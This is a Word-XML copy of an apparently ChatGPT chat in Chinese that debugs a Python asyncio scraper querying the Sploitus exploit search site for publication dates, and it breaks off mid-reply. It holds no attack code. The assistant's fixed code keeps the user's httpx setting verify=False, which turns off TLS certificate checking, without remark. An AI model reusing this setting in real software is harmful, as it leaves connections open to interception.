    <w:p w14:paraId="37F9432C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092BC15" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48466E4F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个警告表明你创建了一个协程，但是没有使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字等待它的结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的协程必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用并等待结果。否则，协程将被创建但永远不会执行，这也就是你看到的那个警告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102B021" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2BBD40" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，你可能有类似这样的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08233A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3C6653" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E5A8A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C54388D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A3996" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41500A75" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ADF19D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>querySploitus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1AD5F9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028F854E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述代码创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程，但是没有等待它。你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用并等待这个协程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9BEA0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4612F04C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F995ADD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193FC686" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFCE48" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989848F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAF4B13" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>await querySploitus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFEBBE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F63E20A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，需要注意的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义的协程函数内部使用。所以，如果你想在程序的顶层运行协程，你需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E389F3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653013E7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007882F4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A446BB0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3F663" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # some code here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7002D4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D294C74" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(querySploitus())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466E099" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C31AFC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 3.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入的一个新函数，它可以接受一个协程作为参数，然后运行事件循环，直到这个协程完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF015F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581492D2" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，当你看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"coroutine 'querySploitus' was never awaited"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的警告时，你应该检查你的代码，确认你正确地使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用和等待你的协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28515F0D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B84A9E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D136185" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B910827" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F29C07" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758ACE7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE1D92" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF12310" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAD90F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5C96C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD1E2E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BC4EB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E4F19" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7D694B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [querySploitus(10*x) for x in range(0,10)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D3BC9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2B6A2E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio.run(querySploitus(url))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B955095" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run(task_list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我这段代码有什么问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A415739" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBD930" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C87B1BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这段代码中，你创建了一个任务列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中的每个元素都是一个协程。然后，你试图将整个列表传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。但这是不正确的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数期望接收的是一个单个的协程，而不是一个协程列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAC5C8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74423184" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了修复这个问题，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，它接收一个协程列表，然后并发运行所有的协程，并等待它们全部完成。修复后的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A728712" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B48998" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F4DB4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0124E928" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00115331" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B11FFF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D254A85" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8AB9F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC9FAF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16BF26" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAFEA55" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABDB903" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F84EC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304B53F6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0D284" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF8FD1A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [querySploitus(10*x) for x in range(0,10)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E129E8C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B591B01" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发运行所有的协程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346DCD68" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DD2AA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5737B353" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样修改之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run(asyncio.gather(*task_list)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会并发运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的所有协程，并等待它们全部完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE762D4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC7132A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> querySploitus() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数似乎期望接收一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为第一个参数，但是在创建任务列表的时候，你传入的是一个数值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
